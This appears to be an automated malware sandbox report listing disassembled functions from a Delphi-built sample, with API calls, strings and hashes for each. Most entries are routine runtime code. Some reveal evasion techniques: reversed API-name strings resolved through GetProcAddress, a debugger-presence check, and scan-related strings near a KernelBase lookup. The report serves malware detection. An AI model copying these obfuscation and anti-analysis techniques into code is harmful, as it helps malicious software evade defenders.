                        • Source File: 00000000.00000002.2622742731.0000000002841000.00000020.00001000.00020000.00000000.sdmp, Offset: 02840000, based on PE: true
                        • Associated: 00000000.00000002.2622728802.0000000002840000.00000002.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.2622787800.000000000286E000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.2622840647.00000000028A2000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.2622874028.0000000002997000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.2622874028.0000000002999000.00000004.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2840000_JDQS879kiy.jbxd
                        Similarity
                        • API ID: ArraySafe$BoundIndex$CopyCreateVariant
                        • String ID:
                        • API String ID: 351091851-0
                        • Opcode ID: 2c879650c84341011691a20226c27d6524aee0beb2559d3f6bcac5042424fc10
                        • Instruction ID: 92a9468006c68d895336e99b82bdb44f5b9bdb7dfeedf5c570c455ddc9f31375
                        • Opcode Fuzzy Hash: 2c879650c84341011691a20226c27d6524aee0beb2559d3f6bcac5042424fc10
                        • Instruction Fuzzy Hash: 0A51B67DA0062D9BCB22DB58C880BD9B3BDBB49304F4441D5EA09E7216DA34AF858F65
                        Function 02843568 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 49registryCOMMON
                        Download Yara Rule
                        APIs
                        • RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 0284358A
                        • RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,028435D9,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 028435BD
                        • RegCloseKey.ADVAPI32(?,028435E0,00000000,?,00000004,00000000,028435D9,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 028435D3
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2622742731.0000000002841000.00000020.00001000.00020000.00000000.sdmp, Offset: 02840000, based on PE: true
                        • Associated: 00000000.00000002.2622728802.0000000002840000.00000002.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.2622787800.000000000286E000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.2622840647.00000000028A2000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.2622874028.0000000002997000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.2622874028.0000000002999000.00000004.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2840000_JDQS879kiy.jbxd
                        Similarity
                        • API ID: CloseOpenQueryValue
                        • String ID: FPUMaskValue$SOFTWARE\Borland\Delphi\RTL
                        • API String ID: 3677997916-4173385793
                        • Opcode ID: 0507a9e1d33bedb4e117609729394b2bd5a8cb9bb25da8dbde0bbddc7fb719d1
                        • Instruction ID: a0f9aaed8ec7b229882b4335572cda4d662f84a193419286da922a69cee60e93
                        • Opcode Fuzzy Hash: 0507a9e1d33bedb4e117609729394b2bd5a8cb9bb25da8dbde0bbddc7fb719d1
                        • Instruction Fuzzy Hash: EF01B57D94021CBBEB11DBA08D07FBD77ECE708710F2005A2FE04D6680EA78A610DA5A
                        Function 028580C0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 44libraryloaderCOMMON
                        Download Yara Rule
                        APIs
                        • GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02858148,?,?,00000000,00000000,?,02858061,00000000,KernelBASE,00000000,00000000,02858088), ref: 0285810D
                        • GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02858113
                        • GetProcAddress.KERNEL32(?,?), ref: 02858125
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2622742731.0000000002841000.00000020.00001000.00020000.00000000.sdmp, Offset: 02840000, based on PE: true
                        • Associated: 00000000.00000002.2622728802.0000000002840000.00000002.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.2622787800.000000000286E000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.2622840647.00000000028A2000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.2622874028.0000000002997000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.2622874028.0000000002999000.00000004.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2840000_JDQS879kiy.jbxd
                        Similarity
                        • API ID: AddressProc$HandleModule
                        • String ID: Kernel32$sserddAcorPteG
                        • API String ID: 667068680-1372893251
                        • Opcode ID: b79943c79096e16b9501d34bb0d283b3b92ee00b8c85f3a0e35778a9772e26e6
                        • Instruction ID: 5487a9b342dfd5c7a71b9818006074901062825d84fa3e744c28afcf970a60a5
                        • Opcode Fuzzy Hash: b79943c79096e16b9501d34bb0d283b3b92ee00b8c85f3a0e35778a9772e26e6
                        • Instruction Fuzzy Hash: 4901447C640318AFE711EBA8D841E5E77AEEB49710F514465A900D7650EE74A9408B15
                        Function 0284A9D0 Relevance: 7.6, APIs: 5, Instructions: 50threadCOMMON
                        Download Yara Rule
                        APIs
                        • GetThreadLocale.KERNEL32(?,00000000,0284AA67,?,?,00000000), ref: 0284A9E8
                          • Part of subcall function 0284A744: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0284A762
                        • GetThreadLocale.KERNEL32(00000000,00000004,00000000,0284AA67,?,?,00000000), ref: 0284AA18
                        • EnumCalendarInfoA.KERNEL32(Function_0000A91C,00000000,00000000,00000004), ref: 0284AA23
                        • GetThreadLocale.KERNEL32(00000000,00000003,00000000,0284AA67,?,?,00000000), ref: 0284AA41
                        • EnumCalendarInfoA.KERNEL32(Function_0000A958,00000000,00000000,00000003), ref: 0284AA4C
                        Memory Dump Source
                        • Source File: 00000000.00000002.2622742731.0000000002841000.00000020.00001000.00020000.00000000.sdmp, Offset: 02840000, based on PE: true
                        • Associated: 00000000.00000002.2622728802.0000000002840000.00000002.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.2622787800.000000000286E000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.2622840647.00000000028A2000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.2622874028.0000000002997000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.2622874028.0000000002999000.00000004.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2840000_JDQS879kiy.jbxd
                        Similarity
                        • API ID: Locale$InfoThread$CalendarEnum
                        • String ID:
                        • API String ID: 4102113445-0
                        • Opcode ID: 50401b366995b83bf9f4a8aadf5591785b370e6ab52d6ca41fb24994ab510094
                        • Instruction ID: 6d8aea24a132355bd858ca9dde2d40e1028f5c2dd0db691dbe13d54d1afa59b5
                        • Opcode Fuzzy Hash: 50401b366995b83bf9f4a8aadf5591785b370e6ab52d6ca41fb24994ab510094
                        • Instruction Fuzzy Hash: 7401F73D28025C6BF705EA688D22F6EB35DDB46B14F910521F614EE780EE689E104A66
                        Function 0284AA80 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 148threadCOMMON
                        Download Yara Rule
                        APIs
                        • GetThreadLocale.KERNEL32(?,00000000,0284AC50,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 0284AAAF
                          • Part of subcall function 0284A744: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0284A762
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2622742731.0000000002841000.00000020.00001000.00020000.00000000.sdmp, Offset: 02840000, based on PE: true
                        • Associated: 00000000.00000002.2622728802.0000000002840000.00000002.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.2622787800.000000000286E000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.2622840647.00000000028A2000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.2622874028.0000000002997000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.2622874028.0000000002999000.00000004.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2840000_JDQS879kiy.jbxd
                        Similarity
                        • API ID: Locale$InfoThread
                        • String ID: eeee$ggg$yyyy
                        • API String ID: 4232894706-1253427255
                        • Opcode ID: faa2277a8e053d72079ed941497891db38181f0238fa866ceb0dc0c30891da4d
                        • Instruction ID: 0bd12f2436b13f55f4f83375243987d1995b87788b921cb733511cbd1b198157
                        • Opcode Fuzzy Hash: faa2277a8e053d72079ed941497891db38181f0238fa866ceb0dc0c30891da4d
                        • Instruction Fuzzy Hash: DA41263D78411D4BE749EB7C88A077EF3EBDB85204B504526E552CF344EE78DA068A22
                        Function 02858018 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 36COMMON
                        Download Yara Rule
                        APIs
                        • GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02858088,?,?,00000000,?,028579FE,ntdll,00000000,00000000,02857A43,?,?,00000000), ref: 02858056
                          • Part of subcall function 028580C0: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02858148,?,?,00000000,00000000,?,02858061,00000000,KernelBASE,00000000,00000000,02858088), ref: 0285810D
                          • Part of subcall function 028580C0: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02858113
                          • Part of subcall function 028580C0: GetProcAddress.KERNEL32(?,?), ref: 02858125
                        • GetModuleHandleA.KERNELBASE(?), ref: 0285806A
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2622742731.0000000002841000.00000020.00001000.00020000.00000000.sdmp, Offset: 02840000, based on PE: true
                        • Associated: 00000000.00000002.2622728802.0000000002840000.00000002.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.2622787800.000000000286E000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.2622840647.00000000028A2000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.2622874028.0000000002997000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.2622874028.0000000002999000.00000004.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2840000_JDQS879kiy.jbxd
                        Similarity
                        • API ID: HandleModule$AddressProc
                        • String ID: AeldnaHeludoMteG$KernelBASE
                        • API String ID: 1883125708-1952140341
                        • Opcode ID: e22d3f81f63f6873bef93e6a7652fd68d7fdd904bce6ab1a9a0caccaf32dbedd
                        • Instruction ID: 3d609a3001061af49bdc614cc085d5d4e028a178eaab0ee5fb40a0af821caa66
                        • Opcode Fuzzy Hash: e22d3f81f63f6873bef93e6a7652fd68d7fdd904bce6ab1a9a0caccaf32dbedd
                        • Instruction Fuzzy Hash: 52F0623C644318AFE710EBA8DC51A5EB7ADFB4A7007914521FD00D3610DE74AD409E66
                        Function 0285EFC8 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19libraryloaderCOMMON
                        Download Yara Rule
                        APIs
                        • GetModuleHandleW.KERNEL32(KernelBase,?,0285F3CC,UacInitialize,028A237C,0286B40C,UacScan,028A237C,0286B40C,ScanBuffer,028A237C,0286B40C,OpenSession,028A237C,0286B40C,ScanString), ref: 0285EFCE
                        • GetProcAddress.KERNEL32(00000000,IsDebuggerPresent), ref: 0285EFE0
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2622742731.0000000002841000.00000020.00001000.00020000.00000000.sdmp, Offset: 02840000, based on PE: true
                        • Associated: 00000000.00000002.2622728802.0000000002840000.00000002.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.2622787800.000000000286E000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.2622840647.00000000028A2000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.2622874028.0000000002997000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.2622874028.0000000002999000.00000004.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2840000_JDQS879kiy.jbxd
                        Similarity
                        • API ID: AddressHandleModuleProc
                        • String ID: IsDebuggerPresent$KernelBase
                        • API String ID: 1646373207-2367923768
                        • Opcode ID: 0b4d599dc2fc03a6fb1f4689ee710838868734a473553f515c2156f538ad00bb
                        • Instruction ID: c89074e88c3670bed14203a52c91fb356090e53b48307f903cb4dae4b52e918d
                        • Opcode Fuzzy Hash: 0b4d599dc2fc03a6fb1f4689ee710838868734a473553f515c2156f538ad00bb
                        • Instruction Fuzzy Hash: D2D0126E3553741EB60036F81CC481E024C8A565697240EA1B536D65D3FE7B89911615
                        Function 0284C3F4 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 16libraryloaderCOMMON
                        Download Yara Rule
                        APIs
                        • GetModuleHandleA.KERNEL32(kernel32.dll,?,0286D10B,00000000,0286D11E), ref: 0284C3FA
                        • GetProcAddress.KERNEL32(00000000,GetDiskFreeSpaceExA), ref: 0284C40B
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2622742731.0000000002841000.00000020.00001000.00020000.00000000.sdmp, Offset: 02840000, based on PE: true
                        • Associated: 00000000.00000002.2622728802.0000000002840000.00000002.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.2622787800.000000000286E000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.2622840647.00000000028A2000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.2622874028.0000000002997000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.2622874028.0000000002999000.00000004.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2840000_JDQS879kiy.jbxd
                        Similarity
                        • API ID: AddressHandleModuleProc
                        • String ID: GetDiskFreeSpaceExA$kernel32.dll
                        • API String ID: 1646373207-3712701948
                        • Opcode ID: 5c30a58fe6fb9b50a16c4eb36a29862d70b8c0d3a09a0eef837ec2d41f6e41a6
                        • Instruction ID: cb90d2b29fb1163dac2180333fb41b7b0cb5b48088855f958787ad5582379581
                        • Opcode Fuzzy Hash: 5c30a58fe6fb9b50a16c4eb36a29862d70b8c0d3a09a0eef837ec2d41f6e41a6
                        • Instruction Fuzzy Hash: 0AD0A76CE4231C4FF7006FB5698AA3626CC9705346F80E827E005D9243EFB5C4144FD4
                        Function 0284E168 Relevance: 6.1, APIs: 4, Instructions: 115COMMON
                        Download Yara Rule
                        APIs
                        • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 0284E217
                        • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 0284E233
                        • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 0284E2AA
                        • VariantClear.OLEAUT32(?), ref: 0284E2D3
                        Memory Dump Source
                        • Source File: 00000000.00000002.2622742731.0000000002841000.00000020.00001000.00020000.00000000.sdmp, Offset: 02840000, based on PE: true
                        • Associated: 00000000.00000002.2622728802.0000000002840000.00000002.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.2622787800.000000000286E000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.2622840647.00000000028A2000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.2622874028.0000000002997000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.2622874028.0000000002999000.00000004.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2840000_JDQS879kiy.jbxd
                        Similarity
                        • API ID: ArraySafe$Bound$ClearIndexVariant
                        • String ID:
                        • API String ID: 920484758-0
                        • Opcode ID: cd7e56306b14da739c94dd26db2064fb48e8dac8868798fc3541503821c87934
                        • Instruction ID: 15f351f2e4cfb2cc0e0a3a5cadd1d66873f359063f32eb12db76202a83ce13d1
                        • Opcode Fuzzy Hash: cd7e56306b14da739c94dd26db2064fb48e8dac8868798fc3541503821c87934
                        • Instruction Fuzzy Hash: BB41D77DA0162D9BCB62DB58CC90BD9B3BDBF59214F0042D5EA49E7211DA34AF808F51
                        Function 0284ACBC Relevance: 6.1, APIs: 4, Instructions: 102COMMON
                        Download Yara Rule
                        APIs
                        • VirtualQuery.KERNEL32(?,?,0000001C), ref: 0284ACD9
                        • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0284ACFD
                        • GetModuleFileNameA.KERNEL32(02840000,?,00000105), ref: 0284AD18
                        • LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 0284ADAE
                        Memory Dump Source
                        • Source File: 00000000.00000002.2622742731.0000000002841000.00000020.00001000.00020000.00000000.sdmp, Offset: 02840000, based on PE: true
                        • Associated: 00000000.00000002.2622728802.0000000002840000.00000002.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.2622787800.000000000286E000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.2622840647.00000000028A2000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.2622874028.0000000002997000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.2622874028.0000000002999000.00000004.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2840000_JDQS879kiy.jbxd
                        Similarity
                        • API ID: FileModuleName$LoadQueryStringVirtual
                        • String ID:
                        • API String ID: 3990497365-0
                        • Opcode ID: e8aab50ecc8a0cd31511b03685991bb43f384e10bf356dfa13acdf1ced713153
                        • Instruction ID: 346cf67bcd1b1210a50d8d6d2a06d05aaaa379a634d305c14a9dcbc619d1335f
                        • Opcode Fuzzy Hash: e8aab50ecc8a0cd31511b03685991bb43f384e10bf356dfa13acdf1ced713153
                        • Instruction Fuzzy Hash: 01411F7D94025C9BDB21DB68CC84BDAB7FDAB18301F0440E6A548EB241DF74AF848F51
                        Function 0284ACBA Relevance: 6.1, APIs: 4, Instructions: 101COMMON
                        Download Yara Rule
                        APIs
                        • VirtualQuery.KERNEL32(?,?,0000001C), ref: 0284ACD9
                        • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0284ACFD
                        • GetModuleFileNameA.KERNEL32(02840000,?,00000105), ref: 0284AD18
                        • LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 0284ADAE
                        Memory Dump Source
                        • Source File: 00000000.00000002.2622742731.0000000002841000.00000020.00001000.00020000.00000000.sdmp, Offset: 02840000, based on PE: true
                        • Associated: 00000000.00000002.2622728802.0000000002840000.00000002.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.2622787800.000000000286E000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.2622840647.00000000028A2000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.2622874028.0000000002997000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.2622874028.0000000002999000.00000004.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2840000_JDQS879kiy.jbxd
                        Similarity
                        • API ID: FileModuleName$LoadQueryStringVirtual
                        • String ID:
                        • API String ID: 3990497365-0
                        • Opcode ID: 93674a93ff0d5307a6e46eb6ecf74b1fe514d13d48c85f94461c3f99a1017e12
                        • Instruction ID: 67b0240be4742119ae352b610a6a05ed153d435405a9c93b65fb9b15889df838
                        • Opcode Fuzzy Hash: 93674a93ff0d5307a6e46eb6ecf74b1fe514d13d48c85f94461c3f99a1017e12
                        • Instruction Fuzzy Hash: AA410E7CA4025C9BDB21EB68DC84BDAB7FDAB18301F0440E5A548EB251DF74AF888F51
                        Function 02841C6C Relevance: 5.3, APIs: 4, Instructions: 330COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.2622742731.0000000002841000.00000020.00001000.00020000.00000000.sdmp, Offset: 02840000, based on PE: true
                        • Associated: 00000000.00000002.2622728802.0000000002840000.00000002.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.2622787800.000000000286E000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.2622840647.00000000028A2000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.2622874028.0000000002997000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.2622874028.0000000002999000.00000004.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2840000_JDQS879kiy.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 3909d61fe602c4af146126b32b676fde955e794a1aca4d3b50ff5620a6c5a160
                        • Instruction ID: fad1486544d6735cec7d0c650a1820e1bf16ce6be00253579240a257723ff37c
                        • Opcode Fuzzy Hash: 3909d61fe602c4af146126b32b676fde955e794a1aca4d3b50ff5620a6c5a160
                        • Instruction Fuzzy Hash: FCA1F7AE7106080BD718EA7CDC883ADB3C69BC4365F18827EE11DCB785EF64C9D68651
                        Function 0284946C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 79threadCOMMON
                        Download Yara Rule
                        APIs
                        • GetThreadLocale.KERNEL32(00000004,?,00000000,?,00000100,00000000,0284955A), ref: 028494F2
                        • GetDateFormatA.KERNEL32(00000000,00000004,?,00000000,?,00000100,00000000,0284955A), ref: 028494F8
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2622742731.0000000002841000.00000020.00001000.00020000.00000000.sdmp, Offset: 02840000, based on PE: true
                        • Associated: 00000000.00000002.2622728802.0000000002840000.00000002.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.2622787800.000000000286E000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.2622840647.00000000028A2000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.2622874028.0000000002997000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.2622874028.0000000002999000.00000004.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2840000_JDQS879kiy.jbxd
                        Similarity
                        • API ID: DateFormatLocaleThread
                        • String ID: yyyy
                        • API String ID: 3303714858-3145165042
                        • Opcode ID: c0d2f20f002ec6f7788a62b90ee45dd019069812cf3bac8a090ca876cc8d1a01
                        • Instruction ID: 79bf8ad1dcb8e582ebc988ad8b1dd132f38dbc683d97aaee388adc245e736296
                        • Opcode Fuzzy Hash: c0d2f20f002ec6f7788a62b90ee45dd019069812cf3bac8a090ca876cc8d1a01
                        • Instruction Fuzzy Hash: C3216D7DA0021C9FDB20DFA8C841BAEB3B9EF49710F5240A5E949E7250DB749E40CB66
                        Function 0285AD5C Relevance: 5.1, APIs: 4, Instructions: 72COMMON
                        Download Yara Rule
                        APIs
                        • IsBadReadPtr.KERNEL32(?,00000004), ref: 0285AD90
                        • IsBadWritePtr.KERNEL32(?,00000004), ref: 0285ADC0
                        • IsBadReadPtr.KERNEL32(?,00000008), ref: 0285ADDF
                        • IsBadReadPtr.KERNEL32(?,00000004), ref: 0285ADEB
                        Memory Dump Source
                        • Source File: 00000000.00000002.2622742731.0000000002841000.00000020.00001000.00020000.00000000.sdmp, Offset: 02840000, based on PE: true
                        • Associated: 00000000.00000002.2622728802.0000000002840000.00000002.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.2622787800.000000000286E000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.2622840647.00000000028A2000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.2622874028.0000000002997000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.2622874028.0000000002999000.00000004.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2840000_JDQS879kiy.jbxd
                        Similarity
                        • API ID: Read$Write
                        • String ID:
                        • API String ID: 3448952669-0
                        • Opcode ID: a93baf0632f810e868fc304dc02f88cb2819ea7b8e0cd4cec62af5963c9676e9
                        • Instruction ID: cdce24b10ae1403e1cf26359b802db9ca37cc5957a34e72dee741892b122ec27
                        • Opcode Fuzzy Hash: a93baf0632f810e868fc304dc02f88cb2819ea7b8e0cd4cec62af5963c9676e9
                        • Instruction Fuzzy Hash: 5421A2BD64022D9BDB14DF69CCC0BAE73A9EF40322F008251EE54D7340EB34E9119AA0